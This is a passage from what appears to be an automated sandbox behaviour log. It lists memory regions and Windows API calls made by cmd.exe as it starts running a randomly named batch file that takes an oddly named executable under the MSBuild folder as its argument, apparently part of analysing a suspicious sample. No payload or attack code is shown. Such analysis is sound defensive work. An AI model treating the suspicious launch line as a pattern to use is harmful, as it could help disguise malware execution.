"c:\\windows\\syswow64\\cmd.exe") Region: id = 7630 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 7631 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7632 start_va = 0x7ee80000 end_va = 0x7eea2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee80000" filename = "" Region: id = 7633 start_va = 0x7eea9000 end_va = 0x7eea9fff entry_point = 0x0 region_type = private name = "private_0x000000007eea9000" filename = "" Region: id = 7634 start_va = 0x7eeac000 end_va = 0x7eeacfff entry_point = 0x0 region_type = private name = "private_0x000000007eeac000" filename = "" Region: id = 7635 start_va = 0x7eead000 end_va = 0x7eeaffff entry_point = 0x0 region_type = private name = "private_0x000000007eead000" filename = "" Region: id = 7636 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7637 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7638 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7639 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7640 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7641 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7642 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7648 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7649 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7650 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7651 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7652 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7653 start_va = 0x3d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7663 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7664 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7666 start_va = 0x7ed80000 end_va = 0x7ee7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed80000" filename = "" Region: id = 7927 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7928 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7929 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7930 start_va = 0x2d0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7931 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 7932 start_va = 0x510000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 7933 start_va = 0x7eea6000 end_va = 0x7eea8fff entry_point = 0x0 region_type = private name = "private_0x000000007eea6000" filename = "" Region: id = 7934 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8106 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8109 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 8110 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8111 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8112 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8113 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8114 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8115 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8116 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 8117 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 8127 start_va = 0x610000 end_va = 0x946fff entry_point = 0x610000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 896 os_tid = 0xf70 [0278.913] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0278.913] __set_app_type (_Type=0x1) [0278.914] __p__fmode () returned 0x77984d6c [0278.914] __p__commode () returned 0x77985b1c [0278.914] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0278.914] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0278.914] GetCurrentThreadId () returned 0xf70 [0278.914] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf70) returned 0x84 [0278.914] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0278.914] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0278.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0280.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fa68 | out: phkResult=0x19fa68*=0x0) returned 0x2 [0280.340] VirtualQuery (in: lpAddress=0x19fa6f, lpBuffer=0x19fa20, dwLength=0x1c | out: lpBuffer=0x19fa20*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.340] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fa20, dwLength=0x1c | out: lpBuffer=0x19fa20*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0280.340] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fa20, dwLength=0x1c | out: lpBuffer=0x19fa20*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0280.340] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fa20, dwLength=0x1c | out: lpBuffer=0x19fa20*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.340] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fa20, dwLength=0x1c | out: lpBuffer=0x19fa20*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0280.340] GetConsoleOutputCP () returned 0x1b5 [0280.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.577] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0280.577] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.577] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0280.649] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.649] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0280.677] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.677] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0280.687] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.687] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0280.693] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.694] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0280.739] GetEnvironmentStringsW () returned 0x517ea0* [0280.739] FreeEnvironmentStringsA (penv="A") returned 1 [0280.739] GetEnvironmentStringsW () returned 0x517ea0* [0280.739] FreeEnvironmentStringsA (penv="A") returned 1 [0280.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19e9cc | out: phkResult=0x19e9cc*=0x94) returned 0x0 [0280.739] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x78, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.739] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x1, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.739] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x1, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x0, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x40, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x40, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x40, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.740] RegCloseKey (hKey=0x94) returned 0x0 [0280.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19e9cc | out: phkResult=0x19e9cc*=0x94) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x40, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x1, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x1, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x0, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x9, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x4, lpData=0x19e9d8*=0x9, lpcbData=0x19e9d4*=0x4) returned 0x0 [0280.740] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19e9d0, lpData=0x19e9d8, lpcbData=0x19e9d4*=0x1000 | out: lpType=0x19e9d0*=0x0, lpData=0x19e9d8*=0x9, lpcbData=0x19e9d4*=0x1000) returned 0x2 [0280.740] RegCloseKey (hKey=0x94) returned 0x0 [0280.740] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432a1 [0280.740] srand (_Seed=0x5bb432a1) [0280.740] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"\"" [0280.740] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\"\"" [0280.740] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.740] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x517ea8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0280.740] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.740] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.741] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0280.741] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0280.741] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0280.741] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0280.741] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0280.741] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0280.741] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0280.741] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0280.741] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0280.741] GetEnvironmentStringsW () returned 0x5180b8* [0280.741] FreeEnvironmentStringsA (penv="A") returned 1 [0280.741] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.741] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.741] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0280.741] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0280.741] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0280.741] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0280.741] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0280.741] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0280.741] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0280.741] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0280.742] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19f7a4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.742] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x19f7a4, lpFilePart=0x19f79c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x19f79c*="Desktop") returned 0x1d [0280.742] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0280.742] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f520 | out: lpFindFileData=0x19f520) returned 0x5105c8 [0280.742] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0280.742] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x19f520 | out: lpFindFileData=0x19f520) returned 0x5105c8 [0280.742] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0280.742] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0280.742] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x19f520 | out: lpFindFileData=0x19f520) returned 0x5105c8 [0280.742] FindClose (in: hFindFile=0x5105c8 | out: hFindFile=0x5105c8) returned 1 [0280.742] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0280.742] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0280.742] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0280.742] GetEnvironmentStringsW () returned 0x5180b8* [0280.742] FreeEnvironmentStringsA (penv="=") returned 1 [0280.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.743] GetConsoleOutputCP () returned 0x1b5 [0280.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.780] GetUserDefaultLCID () returned 0x409 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f8d4, cchData=128 | out: lpLCData="0") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19f8d4, cchData=128 | out: lpLCData="0") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19f8d4, cchData=128 | out: lpLCData="1") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0280.780] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0280.780] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0280.781] GetConsoleTitleW (in: lpConsoleTitle=0x51a9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0280.795] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0280.795] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0280.795] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0280.796] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0280.796] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0280.796] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0280.796] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0280.796] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0280.796] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0280.796] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0280.797] GetConsoleTitleW (in: lpConsoleTitle=0x19f5c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.797] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0280.798] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0280.798] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0280.798] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0280.798] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0280.798] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0280.798] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0280.798] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0280.798] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0280.798] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0280.798] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0280.798] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0280.798] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0280.798] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0280.798] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0280.798] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0280.798] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0280.798] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0280.798] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0280.798] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0280.798] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0280.798] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0280.798] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0280.798] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0280.798] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0280.798] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0280.798] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0280.798] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0280.798] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0280.798] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0280.798] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0280.798] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0280.798] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0280.798] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0280.798] 